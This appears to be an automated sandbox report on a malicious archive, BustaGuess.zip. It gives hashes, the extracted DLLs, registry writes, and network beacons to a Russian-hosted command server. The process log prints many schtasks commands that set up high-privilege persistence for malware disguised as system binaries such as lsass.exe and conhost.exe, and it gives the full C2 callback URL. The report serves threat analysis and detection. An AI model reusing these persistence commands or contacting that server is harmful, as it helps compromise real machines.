| File name: | BustaGuess.zip |
| Full analysis: | https://app.any.run/tasks/cdadae42-381e-46bb-88a6-a0dcd2866c4e |
| Verdict: | Malicious activity |
| Analysis date: | February 19, 2024, 11:25:17 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract, compression method=store |
| MD5: | E6E2ECC3AFC2154E190483793E161556 |
| SHA1: | 20FFF3BE33BE155A5E36F5339E8F5523630674C9 |
| SHA256: | 54090DC19A8647EA05E020D722AC2D40A6481E7C4ACF07ED7B3EAD70A91A776D |
| SSDEEP: | 98304:WGSN2NknwfciGDNcHmY9IkvxqNHleBj5F20PaDKrlCDEWWAE2+6Z:WRIGwEiGDyGY9pxxjZZWWAEc |
| .zip | | | ZIP compressed archive (100) |
|---|
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | - |
| ZipCompression: | None |
| ZipModifyDate: | 2022:03:17 17:20:36 |
| ZipCRC: | 0x00000000 |
| ZipCompressedSize: | - |
| ZipUncompressedSize: | - |
| ZipFileName: | BustaGuess/ |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 268 | schtasks.exe /create /tn "yGpBconhost" /sc ONSTART /tr "'C:\Windows\Installer\{90140000-006E-0410-0000-0000000FF1CE}\conhost.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 296 | schtasks.exe /create /tn "Gc2yexplorer" /sc ONLOGON /tr "'C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\explorer.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 316 | schtasks.exe /create /tn "YwLkexplorer" /sc ONSTART /tr "'C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\explorer.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 572 | schtasks.exe /create /tn "conhost" /sc MINUTE /mo 5 /tr "'C:\Windows\Installer\{90140000-006E-0410-0000-0000000FF1CE}\conhost.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 764 | schtasks.exe /create /tn "7CU2dwm" /sc MINUTE /mo 10 /tr "'C:\Documents and Settings\dwm.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 896 | schtasks.exe /create /tn "QdIOSearchProtocolHost" /sc ONLOGON /tr "'C:\Windows\ehome\en-US\SearchProtocolHost.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 952 | schtasks.exe /create /tn "KTPMlsass" /sc MINUTE /mo 5 /tr "'C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\lsass.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1020 | schtasks.exe /create /tn "lsass" /sc MINUTE /mo 14 /tr "'C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\lsass.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1072 | schtasks.exe /create /tn "YtnQfontPerfsvcwinsession" /sc MINUTE /mo 14 /tr "'C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\fontPerfsvcwinsession.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1124 | schtasks.exe /create /tn "ctfmon" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00A1-041F-0000-0000000FF1CE}-C\ctfmon.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (1432) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (1432) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (1432) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (1432) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\phacker.zip | |||
| (PID) Process: | (1432) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip | |||
| (PID) Process: | (1432) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip | |||
| (PID) Process: | (1432) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\BustaGuess.zip | |||
| (PID) Process: | (1432) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (1432) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (1432) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1432 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa1432.44691\BustaGuess\dll\DLL_MouseDeviceManager.dll | executable | |
MD5:D9E11A2AB50B4FF6AD95EEE5FED3EB48 | SHA256:A48D804C0732591B4C891AC2A7B32D0D627602B950FEC30143A5DAFD5AEE103B | |||
| 1432 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa1432.44691\BustaGuess\dll\DLL_PenSuit.dll | executable | |
MD5:1F7FFEA4DD13500622F1C2F8FCD6D173 | SHA256:20925E5FC22342EEFD2EC58B81953117BA26E7FC0E076B87BCBF7C80DFB4A52A | |||
| 1432 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa1432.44691\BustaGuess\borlndmm.dll | executable | |
MD5:E3FCF256B4683AB92703842985B5E725 | SHA256:CA1F509D6779BC005F332027D50E9BAFA952BCF970953593A9566973B4122759 | |||
| 1432 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa1432.44691\BustaGuess\dbghelp.dll | executable | |
MD5:74EDBB03DE3291FCF2094AF1FB363F1D | SHA256:DCA9F45EFED8EAB442B491AEBDA3E3CCE7F5F9FC5DE527D2DBDFD85A5BE85DFA | |||
| 1432 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa1432.44691\BustaGuess\dll\DLL_AnalyzeGesturesInOne.dll | executable | |
MD5:06302FA1044CE5F410B4E50B45EE89D0 | SHA256:30EA045A8804AEA07D4C10A1B65029459D45075033DB71F91C5DDCE9C35656F1 | |||
| 1432 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa1432.44691\BustaGuess\ini\Custom.ini | text | |
MD5:7950F22EF1D2EFCF819E58DC16B3F4AD | SHA256:808F089951E81B1F2417A61ECE43AF05F33BCBC31A873420C7BC8FFF63DC638F | |||
| 1432 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa1432.44691\BustaGuess\ini\Inform.ini | text | |
MD5:F3B25701FE362EC84616A93A45CE9998 | SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209 | |||
| 1432 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa1432.44691\BustaGuess\ini\FunctionDefine.ini | text | |
MD5:6918B5B988D19B01030F55E97CFC94A2 | SHA256:5C47CE7CCC246C7161FCE5E42C66CB7FA4CD5308FAD8933ED66AFA4309088A1F | |||
| 1432 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa1432.44691\BustaGuess\ini\DefaultScript.ini | text | |
MD5:27567E1E40A29E492743F21DFCF091C4 | SHA256:9E727BE18047F05508543683B69C9085FEF1AB1A01174921B8AE56ECE789EA4E | |||
| 1432 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa1432.44691\BustaGuess\cc32100mt.dll | executable | |
MD5:1EC6FE4798163C9EAB3BC7835FBF4F47 | SHA256:D221DA673572C2D0C8EDC23DE7DFEEA3E6CD6E994427AE48565A16751A3871BC | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3652 | dwm.exe | GET | 400 | 141.8.197.42:80 | http://a0646788.xsph.ru/providerjavascriptCpuUpdatewindows.php?aRAcs8leQABmW=um4UDqOTebYRa&1f193d62ec9c62635c7a577ab8036ca6=ab400134a35ae28afb0d0ba5228d6dfd&dc8ff4a64801661ad57705042575a3b4=wNwcTM4EDN1kTM4Q2MjNWNlJDOwUDNlJ2YhBDMyQWY1IGO0MzNlljZ&aRAcs8leQABmW=um4UDqOTebYRa | unknown | html | 154 b | unknown |
3652 | dwm.exe | GET | 400 | 141.8.197.42:80 | http://a0646788.xsph.ru/providerjavascriptCpuUpdatewindows.php?aRAcs8leQABmW=um4UDqOTebYRa&1f193d62ec9c62635c7a577ab8036ca6=ab400134a35ae28afb0d0ba5228d6dfd&dc8ff4a64801661ad57705042575a3b4=wNwcTM4EDN1kTM4Q2MjNWNlJDOwUDNlJ2YhBDMyQWY1IGO0MzNlljZ&aRAcs8leQABmW=um4UDqOTebYRa | unknown | html | 154 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
3652 | dwm.exe | 141.8.197.42:80 | a0646788.xsph.ru | Sprinthost.ru LLC | RU | unknown |
Domain | IP | Reputation |
|---|---|---|
a0646788.xsph.ru |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
1080 | svchost.exe | Misc activity | ET INFO Observed DNS Query to xsph .ru Domain |